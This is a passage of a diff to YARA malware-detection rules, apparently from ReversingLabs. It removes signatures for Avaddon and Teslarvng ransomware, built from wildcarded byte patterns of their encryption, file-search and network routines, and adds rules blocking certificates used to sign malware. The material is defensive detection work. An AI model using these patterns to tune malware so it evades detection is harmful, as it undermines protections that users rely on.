C3 E8 ?? ?? ?? ?? 8B C3 8B 10 FF 12 50 8B 4D ?? 8B D3 8B C7 E8 ?? ?? ?? ?? 8B - C7 8B 10 FF 52 ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? - E8 ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? 8B C7 E8 ?? ?? ?? ?? 8D 45 - ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 8B 45 ?? E8 ?? - ?? ?? ?? 50 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 EB ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? - ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? - ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 5F 5E 5B 8B E5 5D C3 - } - condition: - uint16(0)==0x5A4D and ($search_files) and ($encrypt_files) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "D and D Internet Services" and pe.signatures[i].serial=="1c:b6:51:9b:25:28:d0:06:d1:da:98:71:53:da:d2:b3" and 1012780800<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Avaddon : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_621E696C3A6371E77A678Cbf0Ee34Ab2 : INFO FILE { meta: - description = "Yara rule that detects Avaddon ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "f3a57482-5799-594b-bcfa-1137ca04dfd5" - date = "2020-10-19" - modified = "2020-10-19" + id = "606749dc-f4ef-526a-8583-486401866759" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Avaddon.yara#L1-L148" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "1b2c449d5bad02dd06cb4a980fcca1feaf02b1d8127096bb39deecbc544272a6" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L15224-L15240" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "67c9fd92681d6dd1172509113e167e74e07f1f86fd62456758b3e3930180b528" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Avaddon" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $find_files = { - 8B FF 55 8B EC 51 8B 4D ?? 53 57 33 DB 8D 51 ?? 66 8B 01 83 C1 ?? 66 3B C3 75 ?? 8B - 7D ?? 2B CA D1 F9 8B C7 41 F7 D0 89 4D ?? 3B C8 76 ?? 6A ?? 58 5F 5B C9 C3 56 8D 5F - ?? 03 D9 6A ?? 53 E8 ?? ?? ?? ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? - ?? ?? 83 C4 ?? 85 C0 75 ?? FF 75 ?? 2B DF 8D 04 7E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 - C4 ?? 85 C0 75 ?? 8B 7D ?? 8B CF E8 ?? ?? ?? ?? 8B D8 85 DB 74 ?? 56 E8 ?? ?? ?? ?? - 59 EB ?? 8B 47 ?? 89 30 83 47 ?? ?? 33 DB 6A ?? E8 ?? ?? ?? ?? 59 8B C3 5E EB ?? 33 - C0 50 50 50 50 50 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? - 33 C5 89 45 ?? 8B 55 ?? 8B 4D ?? 53 8B 5D ?? 89 8D ?? ?? ?? ?? 56 57 3B D3 74 ?? 0F - B7 02 8D 8D ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 84 C0 75 ?? 83 EA ?? 3B D3 75 ?? 8B 8D ?? - ?? ?? ?? 0F B7 32 83 FE ?? 75 ?? 8D 43 ?? 3B D0 74 ?? 51 33 FF 57 57 53 E8 ?? ?? ?? - ?? 83 C4 ?? E9 ?? ?? ?? ?? 56 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 2B D3 0F B6 C0 D1 FA - 42 F7 D8 1B C0 33 FF 57 57 23 C2 57 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 53 FF - 15 ?? ?? ?? ?? 8B F0 8B 85 ?? ?? ?? ?? 83 FE ?? 75 ?? 50 57 57 53 E8 ?? ?? ?? ?? 83 - C4 ?? 8B F8 E9 ?? ?? ?? ?? 8B 48 ?? 2B 08 C1 F9 ?? 6A ?? 89 8D ?? ?? ?? ?? 59 66 39 - 8D ?? ?? ?? ?? 75 ?? 66 39 BD ?? ?? ?? ?? 74 ?? 66 39 8D ?? ?? ?? ?? 75 ?? 66 39 BD - ?? ?? ?? ?? 74 ?? 50 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ?? 83 C4 - ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 6A ?? 85 C0 8B 85 ?? ?? ?? - ?? 59 75 ?? 8B 10 8B 40 ?? 8B 8D ?? ?? ?? ?? 2B C2 C1 F8 ?? 3B C8 74 ?? 68 ?? ?? ?? - ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 8B F8 56 FF 15 ?? ?? ?? - ?? 8B C7 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? C9 C3 - } - $encrypt_files_p1 = { - 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? - 33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 8B 45 ?? 8B - 7D ?? 85 C0 0F 84 ?? ?? ?? ?? 83 FF ?? 0F 84 ?? ?? ?? ?? 6A ?? 8D 4D ?? C7 45 ?? ?? - ?? ?? ?? 51 6A ?? 6A ?? 6A ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 - } - $encrypt_files_p2 = { - 6A ?? 8D 45 ?? 0F 57 C0 50 66 0F 13 45 ?? FF 75 ?? FF 75 ?? 57 FF 15 ?? ?? ?? ?? 85 - C0 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 8D 4D ?? 6A ?? 51 8D 45 ?? 0F 43 45 ?? 68 ?? ?? ?? - ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? FF 75 - ?? 57 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 33 F6 39 75 ?? 0F 86 ?? ?? ?? ?? 83 - 7D ?? ?? 8D 45 ?? 8D 4D ?? 0F 43 45 ?? 83 7D ?? ?? 68 ?? ?? ?? ?? 0F 43 4D ?? 03 C6 - 50 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 8D 4D ?? 8D 45 ?? 0F - 43 45 ?? 53 51 50 6A ?? 6A ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? - ?? 83 7D ?? ?? 8D 4D ?? 6A ?? 51 8D 45 ?? 0F 43 45 ?? 53 50 57 FF 15 ?? ?? ?? ?? 85 - C0 0F 84 ?? ?? ?? ?? 81 C6 ?? ?? ?? ?? 3B 75 ?? 0F 82 ?? ?? ?? ?? 83 7D ?? ?? 74 - } - $encrypt_files_p3 = { - 8B 45 ?? 89 45 ?? 8B 45 ?? 6A ?? 89 45 ?? 8D 45 ?? 50 51 52 57 89 55 ?? 89 4D ?? FF - 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 9D ?? ?? ?? ?? 83 7B ?? ?? 8D 43 ?? 72 ?? 8B 00 6A ?? - 8D 4D ?? 51 FF 73 ?? 50 57 FF D6 85 C0 74 ?? 8B 4B ?? 39 4D ?? 75 ?? 8B 45 ?? 89 85 - ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 6A ?? 89 45 ?? 8D 45 ?? 50 6A ?? 8D 85 ?? ?? - ?? ?? 89 4D ?? 50 57 C7 45 ?? ?? ?? ?? ?? FF D6 85 C0 74 ?? 83 7D ?? ?? 75 ?? B3 ?? - EB ?? 32 DB 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 - ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C7 - 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 - 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? - ?? ?? ?? 83 C4 ?? 8A C3 EB ?? 32 C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D - ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2 - } - $remote_connection_p1 = { - 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? - 33 C5 89 45 ?? 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B 45 ?? 33 C9 8B 75 ?? 89 85 ?? - ?? ?? ?? 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? - ?? 66 89 8D ?? ?? ?? ?? 89 4D ?? 39 4E ?? 0F 84 ?? ?? ?? ?? 66 39 4E ?? 0F 86 ?? ?? - ?? ?? 39 4E ?? 0F 84 ?? ?? ?? ?? 39 4E ?? 0F 84 ?? ?? ?? ?? 8B 06 8D 8D ?? ?? ?? ?? - 8B 7E ?? BA ?? ?? ?? ?? 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 78 ?? ?? 72 ?? 8B 00 6A - ?? 6A ?? 57 FF B5 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B F8 89 BD ?? - ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? - ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? - ?? ?? 83 C4 ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 - 89 85 ?? ?? ?? ?? 85 FF 0F 84 ?? ?? ?? ?? 83 7E ?? ?? 8D 46 ?? 0F B7 4E ?? 72 ?? 8B - } - $remote_connection_p2 = { - 00 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 51 50 57 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? - ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 7E ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? - 8B D0 83 7A ?? ?? 72 ?? 8B 12 83 7E ?? ?? 8D 4E ?? 72 ?? 8B 09 83 7E ?? ?? 8D 46 ?? - 72 ?? 8B 00 6A ?? 57 6A ?? 6A ?? 52 51 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 95 - ?? ?? ?? ?? 8B F8 89 BD ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ?? - ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 - ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 - ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 85 FF 0F 84 ?? ?? ?? ?? 8B 46 ?? 85 C0 - 75 ?? 50 50 50 50 57 FF 15 ?? ?? ?? ?? EB ?? 83 C6 ?? 83 7E ?? ?? 72 ?? 8B 36 50 56 - 6A ?? 6A ?? 57 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? - ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? - ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 84 - } - $enum_resources_p1 = { - 33 D2 89 7D ?? 89 7D ?? 89 75 ?? 89 45 ?? 89 45 ?? 89 4D ?? 89 55 ?? 89 55 ?? 39 56 - ?? 0F 84 ?? ?? ?? ?? 89 55 ?? 89 55 ?? 89 55 ?? 89 55 ?? 83 7E ?? ?? 8B C6 72 ?? 8B - 06 8D 4D ?? 51 8D 4D ?? 51 8D 4D ?? 51 6A ?? 8D 4D ?? 51 6A ?? 50 FF 15 ?? ?? ?? ?? - 89 45 ?? 85 C0 74 ?? 3D ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 83 7D ?? ?? 8B 45 ?? 89 45 ?? - C7 45 ?? ?? ?? ?? ?? 0F 82 - } - $enum_resources_p2 = { - 8D 4D ?? D1 F8 50 52 E8 ?? ?? ?? ?? 8B 7D ?? 8D 4D ?? 8B 75 ?? 83 FF ?? 8B 55 ?? 6A - ?? 68 ?? ?? ?? ?? 0F 43 CE 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? - 8B 7D ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 33 C0 8B 75 ?? 66 89 85 ?? ?? ?? ?? 83 CE ?? - 8B 47 ?? 83 C0 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 - 75 ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7F ?? - ?? 8B C7 72 ?? 8B 07 FF 77 ?? 8D 8D ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? - ?? 8D 8D ?? ?? ?? ?? E8 - } - $enum_resources_p3 = { - 53 8B DC 83 EC ?? 83 E4 ?? 83 C4 ?? 55 8B 6B ?? 89 6C 24 ?? 8B EC 6A ?? 68 ?? ?? ?? - ?? 64 A1 ?? ?? ?? ?? 50 53 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 56 57 50 8D 45 ?? - 64 A3 ?? ?? ?? ?? 8B 43 ?? 8D 4D ?? 89 45 ?? 89 45 ?? 66 8B 43 ?? 6A ?? 68 ?? ?? ?? - ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ?? - 8D 4D ?? 8D 45 ?? 0F 43 45 ?? 51 50 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 7D ?? 8D 45 ?? - 8B 75 ?? 8D 4D ?? 8B 55 ?? 83 FF ?? 0F 43 45 ?? 0F 43 CA 8D 04 70 89 45 ?? 8D 45 ?? - 0F 43 45 ?? 8D 04 70 3B C8 74 ?? 66 83 39 ?? 74 ?? 83 C1 ?? 3B C8 75 ?? 3B C8 74 ?? - 8D 51 ?? 3B D0 74 - } - condition: - uint16(0)==0x5A4D and ($find_files) and ( all of ($enum_resources_p*)) and ( all of ($encrypt_files_p*)) and ( all of ($remote_connection_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Yu Bao" and pe.signatures[i].serial=="62:1e:69:6c:3a:63:71:e7:7a:67:8c:bf:0e:e3:4a:b2" and 1467072000<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Teslarvng : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_21B991 : INFO FILE { meta: - description = "Yara rule that detects Teslarvng ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "7045b13e-95a5-54da-b540-75d464e7673d" - date = "2020-12-14" - modified = "2020-12-14" + id = "333a0901-21e7-5b4a-8daa-6a04fc2c4e86" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Teslarvng.yara#L1-L137" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "670621aa196a80fbb694e4b1690d7da60e881c5b826133939e61cd6c2406ea98" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L15242-L15258" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "54ca9b19adfc9357a3fb74f0670ad929319c4d06a7de7ae400f8285a31052276" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Teslarvng" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $encrypt_files_p1 = { - 53 8B DC 83 EC ?? 83 E4 ?? 83 C4 ?? 55 8B 6B ?? 89 6C 24 ?? 8B EC 6A ?? 68 ?? ?? ?? - ?? 64 A1 ?? ?? ?? ?? ?? ?? ?? ?? A8 ?? 00 00 A1 ?? ?? ?? ?? ?? ?? ?? ?? EC 56 57 50 - 8D 45 ?? 64 A3 ?? ?? ?? ?? ?? ?? ?? ?? C9 89 4D ?? 89 4D ?? 8B 73 ?? 8B 43 ?? 89 75 - ?? 89 45 ?? 3B F0 0F 84 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B 06 8D 04 40 C1 E0 ?? 89 45 - ?? 8B 04 02 8B 40 ?? 8B 30 3B F0 0F 84 ?? ?? ?? ?? A1 ?? ?? ?? ?? ?? ?? ?? ?? 3D ?? - ?? ?? ?? 10 89 ?? ?? ?? ?? E3 ?? 00 0F 43 05 ?? ?? ?? ?? 89 45 ?? C6 45 ?? ?? 33 C0 - 83 C9 ?? 66 89 45 ?? 89 4D ?? 8D 4D ?? 8B 47 ?? 40 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? - ?? ?? ?? 50 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7F ?? ?? 8B - C7 72 ?? 8B 07 FF 77 ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 - ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? - ?? ?? 8D 95 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 33 C9 68 ?? ?? ?? ?? 0F 10 00 0F 11 85 - ?? ?? ?? ?? F3 0F 7E 40 ?? 83 4D ?? ?? 66 0F D6 45 ?? 66 89 08 8D 8D ?? ?? ?? ?? C7 - 40 ?? ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8D 85 ?? - ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 6A ?? 0F 43 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? - 6A ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 74 ?? 6A ?? 8D 4D ?? 51 - } - $encrypt_files_p2 = { - FF 75 ?? FF 75 ?? 50 FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? - ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 65 ?? ?? C6 45 ?? ?? 8D 8D - ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 65 ?? ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D ?? - 8B 41 ?? 89 45 ?? 83 78 ?? ?? 8B 48 ?? 89 4D ?? 72 ?? 8B 00 89 45 ?? C6 45 ?? ?? 33 - C0 83 4D ?? ?? 8D 4D ?? 66 89 45 ?? 8B 47 ?? 40 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? - ?? ?? 50 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7F ?? ?? 8B 47 - ?? 72 ?? 8B 3F 50 57 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? - ?? ?? 68 ?? ?? ?? ?? 8D 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? - 8D 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 6A ?? 0F 43 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A - ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F8 83 FF ?? 74 ?? 6A ?? 8D 45 - ?? 50 FF 75 ?? FF 75 ?? 57 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? - ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 65 ?? ?? C6 45 ?? ?? 8D 4D ?? E8 - ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B 45 ?? 8B 36 8B 4D ?? 8B 04 02 3B 70 ?? 0F 85 ?? ?? - ?? ?? 8B 75 ?? 83 C6 ?? 89 75 ?? 3B 75 ?? 0F 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D - 4B ?? E8 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 8B 4D ?? 33 CD E8 ?? ?? - ?? ?? 8B E5 5D 8B E3 5B C2 - } - $find_files = { - FF D6 83 F8 ?? 0F 85 ?? ?? ?? ?? 8D 43 ?? 50 BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? - ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 83 78 ?? ?? 72 ?? 8B 00 B2 ?? 8B C8 E8 ?? ?? ?? ?? C6 - 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 - ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? - ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 0F 1F 40 ?? 8D 85 ?? ?? ?? ?? 50 - FF B5 ?? ?? ?? ?? 33 C9 8B 85 ?? ?? ?? ?? 03 8D ?? ?? ?? ?? 83 D0 ?? 50 51 FF B5 ?? - ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? F6 85 ?? ?? ?? ?? ?? 0F 84 ?? - ?? ?? ?? BA ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B C8 90 66 8B 31 66 3B 32 75 ?? 66 85 F6 - 74 ?? 66 8B 71 ?? 66 3B 72 ?? 75 ?? 83 C1 ?? 83 C2 ?? 66 85 F6 75 ?? 33 C9 EB ?? 1B - C9 83 C9 ?? 85 C9 74 ?? B9 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B - 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? - 85 C0 74 ?? 8B 45 ?? 8D 8D ?? ?? ?? ?? 51 3B 45 ?? 74 ?? 8B C8 E8 ?? ?? ?? ?? 83 45 - ?? ?? EB ?? 50 8D 4D ?? E8 ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? - ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 8B F0 C6 45 ?? ?? FF B5 ?? ?? ?? ?? - E8 ?? ?? ?? ?? 83 C4 ?? 85 F6 0F 85 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? FF D6 83 F8 ?? 0F - 84 ?? ?? ?? ?? FF D6 8B D0 - } - $enum_shares_p1 = { - 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 A1 ?? ?? ?? ?? - 33 C5 89 45 ?? 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? ?? ?? ?? ?? 45 FC 00 00 00 00 8D - 75 ?? 83 7D ?? ?? 6A ?? 0F 43 75 ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F8 B8 ?? ?? ?? - ?? 56 66 89 45 ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 89 45 ?? FF 15 ?? ?? ?? ?? 66 89 - 45 ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 57 C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 8D - 45 ?? 50 57 FF 15 ?? ?? ?? ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8D 45 ?? 89 7D ?? 50 - 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 6A ?? 6A ?? 89 7D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? - ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 8E ?? ?? ?? ?? 83 7D ?? ?? 0F 87 ?? ?? ?? ?? - 83 7D ?? ?? 0F 86 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 83 7D ?? ?? 8D 4D ?? 8B 75 ?? 0F - 43 4D ?? 03 F1 C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? 0F 43 - 4D ?? 33 C0 66 89 45 ?? 8B C6 2B C1 89 4D ?? 50 8D 4D ?? C7 45 ?? ?? ?? ?? ?? C7 45 - ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? - ?? ?? ?? FF 75 ?? 8D 4D ?? 56 FF 75 ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? 83 7D ?? - ?? 8D 45 ?? 6A ?? 0F 43 45 ?? 51 8D 4D ?? 51 6A ?? 8D 4D ?? 51 6A ?? 50 FF 15 ?? ?? - ?? ?? 85 C0 74 ?? 3D ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 0F 57 C0 C7 45 ?? ?? ?? ?? ?? 66 - } - $enum_shares_p2 = { - 0F D6 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? - ?? 33 F6 8B 55 ?? 85 D2 0F 84 ?? ?? ?? ?? 33 FF 8B 4D ?? 8B 44 39 ?? 85 C0 74 ?? 3D - ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8B 14 39 33 C0 66 89 45 ?? 8B C2 C7 45 ?? ?? ?? ?? ?? - C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 48 ?? C7 45 ?? ?? ?? ?? ?? 89 4D ?? 66 - 8B 08 83 C0 ?? 66 85 C9 75 ?? 2B 45 ?? 8D 4D ?? D1 F8 50 52 E8 ?? ?? ?? ?? C6 45 ?? - ?? 8B 45 ?? 3B 45 ?? 74 ?? 0F 10 45 ?? C7 40 ?? ?? ?? ?? ?? 0F 11 00 F3 0F 7E 45 ?? - 66 0F D6 40 ?? 33 C0 83 45 ?? ?? C7 45 ?? ?? 